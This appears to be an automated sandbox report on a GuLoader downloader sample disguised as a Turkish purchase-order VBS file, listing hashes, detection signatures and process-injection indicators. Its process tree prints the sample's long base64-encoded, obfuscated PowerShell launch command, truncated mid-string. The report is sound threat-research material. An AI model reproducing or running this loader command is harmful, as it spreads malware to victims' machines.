guloader | dfe9ab21fe124997b7f6b2399e42a101f6f023a69eb57e461b7ef1fd016d52a3

General

Target

SATIN ALMA EMRI #BRN3C922022.vbs
Size

228KB
MD5

91795c4a6aba224d0d6d4e78084a9367
SHA1

b9bd48e835540a6732d81d7186a54064b92bfa55
SHA256

35b531c09127533bec6d252aa84233f2b233e578b86c90be5072c2015019e8be
SHA512

0e341edacc186e41c54bfe512882d5378746c2cb3969d7b27781ee6166bad85d41ff333eba3edfb13fbbcd7c8e90acc6eea3aa6e4f0fa342d3ccb9f3c2053235
SSDEEP

6144:hKD8oXovN76Rbc9ykOEXNxkfONRcBzSQ3GbpOMEFfiS:hKBw8RbzkOsxVNRc4uGMr

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1732	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1700 wrote to memory of 1732	1700	WScript.exe	28
PID 1700 wrote to memory of 1732	1700	WScript.exe	28
PID 1700 wrote to memory of 1732	1700	WScript.exe	28
PID 1700 wrote to memory of 1732	1700	WScript.exe	28
PID 1732 wrote to memory of 1164	1732	powershell.exe	30
PID 1732 wrote to memory of 1164	1732	powershell.exe	30
PID 1732 wrote to memory of 1164	1732	powershell.exe	30
PID 1732 wrote to memory of 1164	1732	powershell.exe	30
PID 1164 wrote to memory of 520	1164	csc.exe	31
PID 1164 wrote to memory of 520	1164	csc.exe	31
PID 1164 wrote to memory of 520	1164	csc.exe	31
PID 1164 wrote to memory of 520	1164	csc.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SATIN ALMA EMRI #BRN3C922022.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABEAGEAdgB5AGsAbABhAHAAcABlACAAPQAgAEAAJwANAAoAQQBuAGEAbAB5AEEAUABvAGwAaQB0AGQAUwB1AHAAZQByAGQARwBvAG0AbABhAC0ARQB4AGEAYwBlAFQAVAByAG8AbABsAHkARABvAGIAZQByAHAAcgBlAHAAYQBuAGUAcwBrAGEAdgBlACAAVQBzAHQAYQBuAC0AQwBvAG4AZABvAFQAcABlAHoAaQB6AHkAYwBvAG0AcABvAHAAQgBvAGcAcwB0AGUAUwBsAHUAZAByAEQATABpAGsAdgBpAGUAUwBlAGoAcgBzAGYAUwBpAGwAawBlAGkAUwBlAGsAcgBlAG4ASABvAHYAZQBkAGkARQBsAGUAYwB0AHQAQwBoAGEAegB6AGkAbgBpAGsAbwAgAG8AUwBsAGIAZQB2AG4AbgBvAG4AZABlACAASABhAGkAbABzAEAAUwB0AGUAZQByACIACgBDAG8AdQBuAHQAdQBJAHMAbwBlAGwAcwBTAHAAZQBsAGwAaQBFAG4AZQB0AGkAbgBUAG8AcwAgAEgAZwBTAHQAdgBrAG4AIABMAGkAdABpAGcAUwBBAGYAZgBpAHIAeQBJAG4AaABpAGIAcwBOAHUAegB6AGUAdABzAGEAbQBzAGUAZQBEAHkAcgBlAGUAbQBzAGUAagBsAGsAOwAKAEIAZQBnAHkAbgB1AEMAYQBtAHAAaQBzAEwAdQBsAHUAcwBpAFQAZQBrAHMAdABuAEsAbABlAG0AbQBnAFMAdABvAGUAdAAgAEEAZgB2AGIAbgBTAEEAcwBzAHkAdAB5AE0AaQBsAGkAdABzAE0AbwBuAGUAdAB0AHQAdQBnAHQAZQBlAGoAdQBsAGUAbQBtAGIAZQBrAGUAbgAuAEYAaQBsAGUAdABSAEMAeQBuAGkAYwB1AEQAZQBsAHQAbwBuAFAAeQBqAGEAbQB0AFMAawBpAHIAbQBpAEgAbwBsAGkAcwBtAFMAbwByAHQAaQBlAFAAaQBnAG4AbwAuAFQAbwBiAGEAawBJAEUAbABpAHMAIABuAEcAcgBvAGEAbgB0AFAAcgBlAGEAbABlAFMAcABsAGkAbgByAEIAZQBrAGwAZABvAE4AbwB0AGEAIABwAFMAawByAGwAbABTAFAAZQBuAGQAdQBlAEUAdAB5AG0AbwByAEsAbgBzAHIAbwB2AEgAYQBsAHYAdABpAFAAbwBzAHQAcABjAE8AcgB0AGgAbwBlAE0AYQB0AHQAaABzAEoAbwBsAGwAZQA7AAoARQBrAHMAZQBtAHAATQBhAGQAawB1AHUAQwBhAHYAYQBsAGIAcwBtAHUAdAB0AGwAVQBkAHYAaQBzAGkAVwBlAGQAYgBlAGMAQQBuAGQAZQBsACAAQQBuAGcAcgBlAHMAVABvAG4AdABvAHQAQQBtAGEAbAB0AGEAUwBlAG4AbwByAHQAWQBhAGMAaABhAGkAQwBoAGUAYwBrAGMAQQBtAGYAZQB0ACAATwB3AHMAZQByAGMARABrAHMAdABvAGwAVABlAGsAcwB0AGEARgBqAGUAcgBkAHMAQQBtAHQAcwBmAHMAUwBwAG8AdAB0ACAATwBkAGUAYQAgAFYAQQBuAG4AYQAgAGkATQBpAG4AaQBtAHIAVQBuAGQAcwBpAGsAUwBlAG0AaQBzAGUARQBmAHQAZQByAGwAVgBpAGwAZgBvADEACgBHAGUAbgBpAG4AewBNAGkAbABpAGUAWwBTAHQAcgBpAGEARABCAGEAZwBiAGkAbABNAHIAawB2AHIAbABHAGwAbwBiAGUASQBwAHIAZQBzAHUAbQBJAG4AZABsAG8AcABKAHkAbABsAGkAbwBEAGgAZgAgAEQAcgBBAHIAaQBzAHQAdABjAGkAZwBhAHIAKABUAHMAZQB0AHMAIgBQAHIAYQB0AHQAdwBSAGUAcAB1AGIAaQBMAGEAZwBkAGUAbgBDAGEAdABmAGkAcwB0AHIAZQBhAGQAcABUAHcAYQBlAHMAbwBNAGEAbABhAHIAbwBUAHIAbwBsAG8AbABEAGUAdABhAGMALgBDAGEAbQBwAGEAZABCAG8AYwBrAGkAcgBBAGYAbABhAGcAdgBUAGoAZQBuAGUAIgBIAG8AdQByAGwAKQBBAHAAcAByAGUAXQBTAHQAbwByAHQAcABUAGkAZABpAGwAdQBPAGYAZgBpAGMAYgBUAGUAbABmAG8AbABSAGUAagBuAGYAaQBHAGwAbwBzAGEAYwBzAG8AdQB0ACAAIABPAGQAeQBzAHMAcwBGAGwAbwByAGkAdABBAHIAYQAgAFYAYQBQAGkAbgBiAG8AdABCAHIAdQBkAGYAaQBUAHkAZABlAGwAYwBLAHIAZgB0AHIAIABDAHIAbwBzAHMAZQBSAGUAYQBjAHQAeABBAHIAdABoAHIAdABQAGwAaQBnAGgAZQBQAGUAcAB0AGkAcgBrAHYAaQBsAGkAbgBTAHAAaQBsAGQAIABVAHIAYgBlAGYAaQBGAGUAbAB0AHMAbgBEAGkAcwBwAG8AdABQAGkAbABlAG4AIABNAGEAawBhAGIAQQBMAHMAZQBwAHUAZABTAHAAZQBjAGkAZABTAG8AdgBlAHYARgBNAGUAcgBjAHUAbwBVAGQAcwBrAHIAcgBUAGEAYgB1AG8AbQBhAHMAcwBvAHIAKABTAGEAbgBzAGUAaQBSAGEAYQBkAGcAbgBFAHUAYwByAHkAdABCAHIAbwBrAGwAIABVAG4AZQBmAGYARABUAHIAdQB0AGgAaQBVAGQAZgByAGkAZwBCAGEAaQBsAGkALABCAG8AZgBsAGwAaQBVAG4AawBpAG4AbgBiAGkAbgBkAGUAdABQAGEAcwBzAGEAIABGAGkAbAB0AGgASwBrAHYAaQBsAGkAdQBBAG4AZABlAG4AbABBAGcAZwByAGUALABSAGkAcwB0AHMAaQBTAHQAcgBvAGIAbgBMAGEAbgBkAHMAdABVAG4AdgBpAGcAIABCAGEAYgBhAGkAQQBKAHUAbgBnAGUAZQBJAG4AZABmAHIAYwBtAG8AbgBzAHUAaQBCAGUAbABpAGcAbwBQAHIAZQBuAG8AdABUAHIAcwB0AHUAKQBUAHIAYQBzAGYAOwAKAFQAcgBlAGgAagBbAFAAaAB5AGwAbABEAEYAdQBtAGUAbABsAFMAawByAG8AdABsAFMAawB5AGwAbABJAFUAbgBkAGUAbABtAFMAdQBwAGUAcgBwAEEAcgBzAGUAbgBvAEwAYQB5AGwAbwByAFMAdwBpAG4AZwB0AEUAcgBnAGEAcwAoAEMAaABhAHIAaQAiAEYAbwByAHMAcABrAEEAbABrAHkAbQBlAEsAaQBzAHQAZQByAFUAZABvAG0AZQBuAFAAZQBkAGEAZwBlAFQAYQBhAHIAZQBsAEQAYQBhAHIAbAAzAFMAeQBzAHQAZQAyAEUAcgBuAHMAdAAiAEwAaQBuAGQAZQApAFMAeQBsAHYAYQBdAFYAYQBzAHMAYQBwAFMAawBhAGIAIAB1AEYAbwByAGUAbABiAEYAdQB0AGgAbwBsAE4AbwBuAG0AdQBpAEcAdQBlAHIAaQBjAE0AYQBuAG4AaQAgAEcAZQByAG0AYQBzAFMAaQB0AGQAbwB0AEQAaQBhAHIAaQBhAFkAbgBnAHMAdAB0AEkAbgBkAHUAbABpAFQAZQByAG0AaQBjAFIAZQBwAHIAYQAgAEQAawBzAHMAdABlAEEAdgBhAHMAYwB4AFAAaABvAHQAbwB0AE0AaQBuAGkAaABlAEMAbwB1AG4AcwByAFMAdAByAGkAZABuAEYAdQBtAGEAcgAgAEwAZQBnAGUAbgBpAEEAcgBtAGkAcwBuAE8AeQB2AGkAbgB0AHQAaQBsAHMAawAgAEQAYQBuAGsAbgBWAEsAYQBsAGsAIABpAEYAbwByAHMAawByAEQAagByAHYAZQB0AFIAeQB0AG0AaQB1AFUAZAB2AGkAawBhAEgAbwBtAG8AYwBsAGUAZgB0AGUAcgBBAEkAbgBkAHYAYQBsAGUAbgB3AGkAcwBsAEkAcwBvAHAAbwBvAFAAaABpACAASABjAHIAZQB0AHIAbwAoAEUAbQBwAGEAdABpAFAAcgBvAGcAcgBuAEEAbABsAGUAcgB0AEsAYQBsAG8AcgAgAFIAZQBqAHMAZQB2AEUAeABvAHMAcAAxAFMAdAB5AHIAZQAsAFMAYQBsAHAAIABpAFYAZQByAGQAZQBuAFIAZQBpAHQAZQB0AEUAdgBhAGwAdQAgAEMAeQBjAGwAbwB2AEQAaQBzAG8AYgAyAEMAbwB3AHIAbwAsAFIAZQBnAGcAZQBpAEgAeQBwAGUAcgBuAFMAaABhAG0AcAB0AE4AYQB0AHQAZQAgAFMAZQBtAGkAbQB2AFMAdQBwAGUAcgAzAFMAdABlAGQAbQAsAFMAdQBiAGoAZQBpAFQAaAByAGUAYQBuAE8AdQB2AGUAcgB0AFEAdQBhAGQAcgAgAFAAaQBjAGsAdQB2AEUAYwBoAGUAbAA0AGQAbwBtAGsAaQApAEIAdQB0AGEAZAA7AAoARwBhAGwAbABvAFsARABlAG0AbwBuAEQARABvAGEAbgBkAGwAVgBlAGkAbgBpAGwASABvAHIAbQBvAEkAVABhAGwAbABlAG0AQQByAGIAZQBqAHAAQQB1AHQAbwBkAG8ASABqAHMAawBvAHIAWQBhAGsAawBlAHQASQBuAGQAcwB5ACgAaQBtAHAAbwBsACIAUwBuAGEAawBrAGcARwBlAG4AaQAgAGQAUgBhAHAAYQBuAGkASwBpAHQAdABsADMARABpAHMAdABpADIASABqAG4AZQBzACIAQgB5AGcAZQBuACkAUgBlAGgAYQBiAF0AUgBlAHQAcwBsAHAAUwBlAGUAYgBlAHUAUAB1AGUAYgBsAGIATgBpAGsAIABXAGwAQwBoAHIAbwBtAGkAUwBsAGEAbgBnAGMAUwBhAHQAaQByACAAQQBuAHQAaQBsAHMAVABvAGIAYgB5AHQASABvAHYAZQBkAGEARgBpAGwAbQBzAHQAUwBpAGQAZQBmAGkATQBvAHMAdABpAGMAQgBlAGIAbwBlACAATwBwAGsAcgBzAGUAQQBmAGYAbABhAHgAVQBuAGQAZQByAHQAVQBwAGcAYQBwAGUAUwB0AHIAaQBkAHIASQBuAHMAdAByAG4AUgBhAG0AaQBmACAAUgBlAGsAbwByAGkAVgBhAGEAZABiAG4AVABqAGUAawBrAHQARAByAG8AZwBoACAAZQBuAGMAbwBwAFMAUAB1AHIAZwBlAGUAUABhAHAAZQByAHQAQgBsAHIAZQBiAFAAUAByAGMAaQBzAGkARwBvAG4AYQBwAHgAQQByAGIAZQBqAGUARgByAG8AcwB0AGwAVABlAGsAcwB0AEYATwB1AHQAcABhAG8AcAByAGUAaQBuAHIAQQBtAHkAZwBkAG0AQQB4AGkAYQB0AGEAQgByAG4AZQB2AHQAYQBwAGgAcgBvACgAUwBwAGwAZQBlAGkAQgBpAGQAZQAgAG4ATQBlAG4AYQBnAHQAUwBjAHIAdQBtACAAUgBlAG0AaQBuAEQATwB2AGEAdABvAGkAQgBsAGkAbgBkAGEARgBvAHIAZQBiADEAUABpAG4AbgBvADYAVQBuAGQAZQByADAASgBvAHUAcgBuACwAQwBvAHMAaABlAGkAYgByAG4AZABlAG4AQwBvAG4AdABpAHQASQByAGkAZABpACAAdABpAGwAbAByAEEARABlAG4AcwBhAHAAaQB0AGEAbQBhAHQAdQBkAGwAdQBmAGUATQBlAGQAaQBjAHIAUgBlAHMAbwBsACwATwB6AG8AbgBlAGkAUwB0AGEAdABzAG4AVABlAGwAZQBnAHQARQBtAHAAcgBpACAAUgBlAG0AaQBzAEQAQwBoAGEAdgBlAGUAUABoAG8AdABvAGIATQBvAHIAZwBlAGkAQgBpAGcAYQBtAHQAUgBvAG8AcwB0ADEAVgBvAHQAYQByADkATQBlAGwAYQBnADYARAB5AHIAZQBoACkAUwBrAHkAbABkADsACgBPAHYAZQByAGQAWwBCAGEAbgBhAGwARABUAHIAbwBuAGYAbABQAGwAYQBjAGUAbABmAHIAZABpAGcASQBNAGkAcwBjAG8AbQBMAGkAbgBlAG4AcABCAG8AbwBrAHMAbwBWAG8AbABhAHAAcgBPAHYAZQByAHMAdABTAGUAbAB2AGUAKABuAGUAaQBnAGgAIgBZAG8AdwBlAGQAdQBNAGkAbgBpAG0AcwBTAHQAYQByAHQAZQBVAG4AZABlAGYAcgBVAGQAcwB1AGcAMwBZAGEAdABhAGcAMgBBAGYAZgB5AHIAIgBTAGkAZABlAGwAKQBVAGEAZgBtAHIAXQBOAG8AbgBmAGkAcABEAHUAYwBrAHcAdQBTAHQAZQBqAGwAYgBUAGEAagBlAHMAbABCAGwAYQBkAGgAaQBGAGkAbgBlAGwAYwBDAGwAYQB4AG8AIABVAG8AcABkAHIAcwBwAGEAdAByAHUAdABSAGkAZABkAGwAYQBCAG8AawBzAGUAdABGAG8AcgBzAGkAaQBNAGkAZABkAGUAYwBiAGUAcgBlAGcAIABTAG8AYwByAGEAZQBLAGEAbABrAHUAeABPAHQAbwBsAGkAdABCAG4AawBoAGEAZQBTAHQAagBlAHIAcgBOAG8AbgB3AGEAbgBTAGEAZgByAGEAIABmAGoAZQByAG4AaQBCAHIAYQBjAGgAbgBHAGwAdQBtAG8AdABQAGkAYwB0AHUAIABNAGkAYwBoAGUAUwBDAGgAYQBsAGwAZQBEAHIAZQBhAGQAdABBAG4AYwBpAGUARABBAGIAbwB2AGUAbABDAG8AbgBjAGUAZwBTAGUAbgBzAHUASQBJAGQAZQBvAGcAdABUAGkAbgBmAG8AZQBGAHIAbABhAGEAbQBVAHYAYQBuAGwAVABNAGkAYwByAG8AZQBBAGYAcwB0AGUAeABTAHAAZQByAG0AdABTAGEAdQBkAGkAKABNAGEAZAB2AGEAaQBHAGEAYgBiAHkAbgBBAHIAdgBlAHMAdABQAGwAYQB1AGQAIABSAGUAZwBpAHMAQgBvAHYAZQByAHQAYQBTAGUAcgB2AGkAcgBFAHgAYQBjAHQAcQBTAGsAZQBwAHQAdQBSAGUAYwBpAHQAZQBQAGUAbgB0AHkALABBAGYAZwByAHMAaQBTAGEAbgBkAHMAbgBLAHkAbABsAGkAdABHAGEAbABtAGEAIABQAGEAcgB0AHcARgBmAG8AZABiAG8AYQBTAG4AawBzAG0AcwBNAG8AcgBhAHYALABVAG4AawBuAG8AaQBVAGQAYgByAHkAbgBNAHUAcgBwAGgAdABaAHkAbQBvAHQAIABMAG8AYgBhAHQAVQBLAGwAYQBwAHIAbgBWAHIAZABpAG0AZABBAG4AZQBzACAAZQBjAGgAaQBuAGIAcgBiAGUAbQB5AG4AKQBTAHQAcgBpAG4AOwAKAEYAbABsAGUAcwBbAFMAYQBuAGQAaABEAEYAaQBuAGoAdQBsAFMAeQBzAHMAYQBsAFUAbgBjAGUAaQBJAFAAYQBhAHMAawBtAEYAbwByAHMAawBwAHYAYQBkAGUAZgBvAFMAawBhAHQAdAByAFYAZQByAGQAZQB0AHMAbABhAGIAYgAoAGcAZQBuAHMAaQAiAGUAbQBwAGkAcgB3AE0AaQBjAHIAbwBpAEQAZQBnAGEAZwBuAFQAaABvAHIAYQBtAFMAdABlAG0AbQBtAEgAbgBuAGkAawAuAEQAaQBwACAAQgBkAEIAbABpAGQAaABsAFMAcABvAGwAZQBsAFAAYQByAGsAZQAiAEUAbABlAGsAdAApAFAAYQBhAHMAawBdAFMAdQBiAGoAZQBwAFAAYQBuAGgAZQB1AEYAbABhAG4AZQBiAHUAZABhAHMAZQBsAE8AcgBhAG4AZwBpAEgAeQBwAG4AbwBjAGQAbwBsAGwAYQAgAEsAcgB5AGQAcwBzAGwAZQB0AHQAZQB0AFMAZQBrAHMAbwBhAEsAbwByAHQAcwB0AFUAZABoAGEAbABpAFUAbgBhAHcAawBjAFMAdABhAG0AYgAgAFQAYQBpAHAAYQBlAEIAbwB1AHMAdAB4AHMAcABlAGMAdQB0AHAAYwBhAG4AZQBlAFMAZQBuAG4AZQByAHMAcABlAGUAZABuAEYAcgBpAHMAaQAgAHIAdQBzAHMAZQBpAGoAdQBuAGsAZgBuAFMAYQBnAGwAaQB0AFAAaQBjAG8AcwAgAGMAaABpAGUAbAB0AFQAbwBzAGsAaQBpAE0AaQB0AGkAZwBtAFMAawBuAGwAaQBlAEIAZQBrAGUAbgBTAE0AbwByAHUAYQBlAFYAYQBmAGYAZQB0AEQAZQBkAHUAYwBFAFMAeQBuAHMAbwB2AEIAZQBhAHUAdABlAFAAYQByAGwAYQBuAEIAdQByAGUAYQB0AEIAZQBzAHQAaQAoAG0AaQBsAGUAcABpAEEAcgBsAGUAdABuAFQAaQBsAGwAZwB0AEgAZQByAHMAawAgAE4AYQB0AGkAbwBUAFMAZQBpAHMAZQBpAFMAYQBuAGQAZQBsAFAAcgBvAGUAdABzAE8AdgBlAHIAcwAsAG8AdgBlAHIAYwBpAEYAbwByAGYAZABuAFMAawByAHYAZQB0AFMAbwBsAGQAYQAgAEwAdQBzAHQAcwBNAE4AbwBiAGIAbABhAGYAbwByAGQAZQBpAHUAZgBvAHIAZAAsAG4AbwBuAGMAZQBpAEgAYQBnAGkAbwBuAFkAbwB1AGQAIAB0AFIAZQBkAG8AYwAgAFMAawBvAHYAbQBTAFUAZABzAGEAbgBlAFUAZABtAGEAdAByAE0AYQBpAGQAZQBmAGoAZQBhAG4AZQBoAFYAdQBnAGcAZQBvAEsAbwBtAG0AdQAsAFMAcABhAGQAZQBpAFUAZABsAGkAcwBuAFIAZQBqAG8AaQB0AFIAYQBuAGQAaQAgAEYAbwByAG0AYQBDAFMAawByAGEAYgBhAFMAdQBiAHAAcgB1AEQAZQBmAGkAbAAsAFMAawB5AGcAZwBpAFQAcgBpAGEAbABuAFMAYwBhAGwAYQB0AEcAbwBtAHAAaAAgAEEAZABhAG0AcwBOAEsAcgBuAGkAawBvAFMAbABhAGcAdgBuAEoAbwBuAGEAcwApAEEAZgBoAHUAZwA7AAoAUwBrAGEAbABkAFsAUABhAG4AYwBvAEQAQgBsAG8AdABsAGwAQwBvAGwAegBhAGwAQgByAG4AZQBnAEkATgBhAHQAaQB2AG0AVABlAGsAcwB0AHAAVQBuAGcAZABvAG8ATgBlAGcAZQByAHIATgBhAHMAYQByAHQAQwBlAHAAIABDACgAQgBpAG4AZABlACIAUwBoAGEAbQBvAGsAQgBlAG4AegBvAGUAQQB0AHQAaQByAHIARABpAHMAZQBtAG4ARwBlAG4AZABhAGUAZQBmAGYAZQBrAGwAUwB0AGEAZABmADMARwBlAG8AcgBnADIAUwBrAGkAYgBzACIAQQBnAGcAaQBzACkAUABhAHcAawBlAF0AVgBhAG4AZABnAHAATQBpAGwAagBiAHUAUwB2AGEAYgByAGIAUwBuAG8AcgB0AGwAUwB1AGIAYQBsAGkAUAByAGkAbwByAGMARgBpAG4AYQBuACAAQwBpAHIAawB1AHMATQBhAGwAYQBjAHQARQBuAGMAZQBmAGEAUgBlAHAAdABpAHQAZgByAGsAawBlAGkARQB1AHIAbwBwAGMASABvAHcAcwBvACAAUwBwAHIAaQB0AGUAQgBhAHIAbgBlAHgAQgB1AGwAbABlAHQATABvAHQAdABlAGUAUgBlAGMAdABpAHIATABvAGMAYQBsAG4AUQB1AGEAcwBzACAAbABhAGEAbgB0AGkASwBhAG0AcABkAG4AZABpAGMAaABvAHQAQwByAG8AdQB0ACAASABpAGQAZgByAFIATgB5AGsAIABOAGUATwBwAHMAaQBnAGEASwBuAG8AbABkAGQAQQBuAGUAcwB0AFAATQBpAHMAdAByAHIAVABoAGUAbQBpAG8AVgBpAGwAbAB1AGMAVgBlAG4AZABlAGUAVABvAGcAYQAgAHMATwByAGEAbABmAHMAQgBhAG4AdABhAE0AUABoAG8AdABvAGUAVQBuAG4AbwB0AG0AUwBoAGUAaQBrAG8AcgBvAGQAcwBrAHIAVQBuAGUAbgB3AHkARABlAGMAYQBuACgAQgByAGEAaQBuAGkAUwB0AHIAZwBrAG4ATABnAGUAbQBpAHQAVABlAG4AcwBpACAAQgByAGEAdABzAFYAUwBwAGkAcgBlAGUAUABoAGUAbgBvAHIASQBuAGMAdQBzACwAYwBvAG4AdgBlAGkASQBuAHQAcgBhAG4AUABhAGwAbQBlAHQAUwBjAHIAdQB0ACAAQgBlAGwAYQBuAE0AUABvAHAAcABhAHkATwB2AGUAcgBzAHQAVAB2AHIAcwB0AGgARgBvAHIAYgBlACwATQBhAGQAZABpAGkAUwB1AGIAYgBvAG4ATAB1AG0AaQBuAHQAQwByAGUAcABlACAASwBvAG4AZwBlAEEAQQBuAHMAZwBlAGsAUwB1AGIAaQBuAGEATwBwAGQAcgBhAHYASwB1AHMAaQBuAGUAQgBpAG8AaABlAGQARgBlAHIAbQBhADQARQB4AGEAbAB0ADAAVAByAGEAbgBzACwAVABvAG4AaQBjAGkAUwBoAGEAZwByAG4ASABlAG0AYQB0AHQASwBhAHIAdwBpACAAQgByAG4AZQBvAFYATABvAGUAaQBuAHUARwBhAHMAdAByAGwAVQBuAHMAdQBwADEARABpAGsAdABpADgARQBkAHMAdgBvADAAUwBwAGUAYwBpACwAYQBuAGwAaQBhAGkAZgByAGkAaABlAG4ASABlAHIAbABpAHQARABlAGYAcgBvACAATABlAHYAYQBuAFUAUwBvAGwAaQBkAGQASwBvAG0AbQB1AHMAUwBpAHQAegBtAHAAVABhAG0AYQBuAGUAVQBuAG0AbwBuAGsATQBvAGIAaQBsACkARABhAGcAbABpADsACgBTAGUAdgBlAHIAWwBCAHUAdABvAG0ARABTAGMAaABlAG0AbABFAGMAaABvAHAAbABVAG4AZABlAHIASQBIAHkAcABuAG8AbQBFAGwAZQBrAHQAcABCAGEAZABlAHYAbwBTAGEAbQBtAGUAcgBUAGEAbgB0AGEAdABUAGkAZABzAHIAKABDAHkAYwBsAG8AIgBVAGQAcwBhAGUAZwBXAG8AbwBkAHMAZABFAHgAYQBsAHQAaQBUAGkAbABsAHUAMwBHAGwAZQBnAG4AMgBNAG8AdQByAG4AIgBBAGwAdABpAG4AKQBiAHIAYQBpAG4AXQBLAGkAbABvAHAAcABHAGwAeQBrAG8AdQBPAG0AZwBpAHYAYgBGAGEAbgBnAG8AbABTAHAAYQByAHQAaQBOAGkAZQBjAGUAYwBIAHUAbgBkAHIAIABNAGEAbQBtAGkAcwBUAGkAbABzAGsAdABDAHUAbAB0AGkAYQBNAG8AZQBuAHMAdABBAGYAcwBtAGkAaQBHAG8AbgBpAHQAYwBFAGwAZQBrAHQAIABFAGsAcwB0AHIAZQBNAG8AdABpAGwAeABIAHkAZQBuAGEAdABQAGwAZQBuAGEAZQBUAGUAbQBlAG4AcgBGAHIAaQBlAGQAbgBDAGgAYQBtAGkAIABVAG4AbAB1AGMAaQBCAHUAcgBpAGUAbgBCAGkAbwBwAGgAdABGAGwAaQBtAHIAIABQAGUAbgBuAGEAUwBVAG4AcABsAGEAZQBNAGEAegBpAG4AdABTAG0AcgBlAGgAQQBOAG8AbgBlAHgAcgBVAG4AZABlAHIAYwBGAHUAbgBrAHQARABIAGUAcgBlAHMAaQBMAHUAbQBtAGUAcgBNAHIAcwBrACAAZQBPAHYAZQByAGIAYwBGAG8AcgB0AHIAdABBAG4AbABnAHMAaQBNAGEAagBvAHIAbwBTAHUAcABlAHIAbgBOAG8AbgBhAHIAKABTAGkAbQBiAGEAaQBCAGwAbwBuAGQAbgBBAHMAYQByAG8AdABWAHIAYQBuAGcAIABVAG4AZABlAHIAQQBEAGUAcgBtAGkAZgBjAGgAYQBiAGwAcwBjAGEAbgB5AG8AawBLAGkAbgBrAGkAZQBOAGEAdQB0AGkAZABUAGUAZwBuAGUALABTAGsAdQBtAGIAaQBSAGUAYwBvAHYAbgBSAGEAdAB0AGUAdABNAGkAcwB0AGkAIABNAG8AcgBmAGkAVABFAHQAaABlAHIAaQBHAGwAbwBzAHMAdAB2AGUAcgB0AGkAKQB1AGQAcwBpAHYAOwAKAEUAeABjAHUAcwBbAEEAZwB1AHIAawBEAFMAYQBtAG0AZQBsAEYAYQByAHYAZQBsAGUAcwB0AGEAYgBJAFIAcgBoAGEAdABtAEIAYQBhAGQAcwBwAE4AYQB2AG4AZQBvAE0AYQBnAGkAcwByAGQAZQBtAG8AZAB0AEEAYwBjAGUAbAAoAHoAdQBjAGMAbwAiAFQAYQByAHQAYQBrAEUAbABhAHQAcgBlAFQAaQBsAGgAbwByAEYAbwByAG0AbwBuAE0AYQBuAGQAcgBlAFQAcwBlAG4AIABsAFQAcgBpAGUAdAAzAFMAbQByAHIAZQAyAEIAcgBlAGEAZAAiAEgAZABlAHIAcwApAEYAbwByAHQAbgBdAEEAYwBjAGUAcABwAFQAZQBtAHAAZQB1AEMAaQBzAHAAbABiAFYAbwBsAGQAcwBsAEcAcgBhAGEAZwBpAFAAYQBwAGUAcgBjAFIAdQBtAG8AdQAgAEcAZQBqAHIAcwBzAFUAbgBlAHgAcAB0AEYAbwByAHAAYQBhAEYAYQB0AHQAaQB0AEgAZQB4AGEAYwBpAFMAYQBwAHMAawBjAE0AYQBjAHQAcgAgAEYAbABlAHQAdABlAFAAbABlAG4AdQB4AFYAYQBnAHQAcwB0AFQAYQBtAHQAYQBlAE0AbABrAGUAawByAFMAawBhAGQAZQBuAEwAZwBuAGEAZwAgAG0AYQBzAGsAZQBJAEYAbwBvAGwAaABuAFUAbQB0AHQAZQB0AEYAbwB0AG8AcwBQAE0AbwB1ACAAVgB0AFQAaQBsAGIAYQByAEYAdQBuAGUAYgAgAFIAaQBkAGwAZQBFAE0AdQBnAGYAdQBuAFAAcgBlAHAAbwB1AEcAYQByAGEAZwBtAEkAcwBvAHAAZQBTAFcAZQBpAGcAaAB5AEsAZQByAG4AZQBzAEQAaQBzAHMAZQB0AFMAbABhAGwAbwBlAFYAZQBkAHQAYQBtAEMAbwBtAGUAdABMAEwAYQBzAHQAZQBvAEIAbABvAGQAcABjAEwAaQBiAGUAbABhAHQAbwB1AHAAIABsAHMAcABlAGQAYQBlAEsAaQBtAG8AbgBzAFAAcgBvAG4AbwBBAEYAbwByAHMAZwAoAEcAYQB1AGwAdAB1AFQAcgBvAGYAZQBpAEUAZgB0AGUAcgBuAFIAZQBwAHIAbwB0AEwAYQBuAGQAcwAgAEUAZgB0AGUAcgB2AFQAcgB1AG0AcAAxAEwAdQBnAHQAdQAsAEIAaQBzAHAAZQBpAEMAbwBuAHQAcgBuAE0AaQBsAGkAdAB0AGIAaQB0AHQAZQAgAGQAbwBtAHMAYQB2AFQAdQBpAHQAaQAyAEUAcgBzAHQAYQApAFMAdQBsAGYAbwA7AAoAUABlAG4AZwBlAFsATABhAGIAcwBhAEQATABpAGwAYQAgAGwAQgBsAG8AawBoAGwAUABhAGwAbQB1AEkAVQBkAGwAYQBhAG0AUwBsAG8AYQBuAHAASAB5AGwAZABlAG8ATABvAGsAYQBsAHIAdwBpAHQAdABlAHQAVQBuAG0AZQBsACgAUABuAGUAdQBtACIAVABlAHIAbQBpAGsAVQBuAG8AZABvAGUASQBuAHYAZQBuAHIAVQBuAGQAZQByAG4ARQBnAGUAdAByAGUAVQBkAGUAbAB0AGwASgBvAG4AaQBuADMATQBhAGEAZwBlADIAVwBpAHIAZQBtACIASwBlAG4AdwBpACkAUwBuAGIAZQBsAF0AVQBuAGEAcABwAHAAUwB0AGEAbgBnAHUATwBwAGsAYQBsAGIAYQB1AHQAbwBoAGwAZQBuAGsAZQBwAGkAUABhAHMAdABvAGMATgBvAG4AcwBjACAAQgBvAGwAZABrAHMAQgByAHUAZwBzAHQAUgBhAGEAcwB0AGEAUwB0AHIAbQBwAHQAbABlAHYAZQBhAGkAUABpAHAAcgBvAGMAcABvAHMAdABrACAATwB2AGUAcgBrAGUARgBlAGoAZQBiAHgAUgBlAGQAcgBpAHQAUgBlAGMAdABvAGUAUwB0AG8AcgBtAHIAQQBwAHAAcgBvAG4AQQB0AGUAbABlACAAQgBpAHMAd